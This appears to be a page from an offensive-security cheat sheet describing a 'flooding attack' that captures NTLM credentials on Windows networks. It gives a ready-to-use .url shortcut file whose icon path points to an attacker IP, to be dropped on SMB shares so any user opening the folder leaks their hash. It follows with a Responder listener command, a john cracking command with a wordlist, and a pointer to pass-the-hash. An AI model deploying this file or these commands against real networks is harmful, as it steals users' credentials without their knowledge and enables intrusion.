Flooding Attack

This method is using Internet Icon file saved to smb shares connect to responder. The idea is every user access the folder, would reload the Internet Icon and in case the file is in the smb shares that makes the computer request access with sending the ntlm creds to the icon url.

file (testing.url)

[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\<attacker ip>\%USERNAME%.icon
IconIndex=1

Responder

responder -I tun0 -v

Next?

  • Crack the hash

john hash.file --wordlist=/usr/share/wordlists/rockyou.txt

  • pass the hash

PreviousBloodHoundNextPayload

Last updated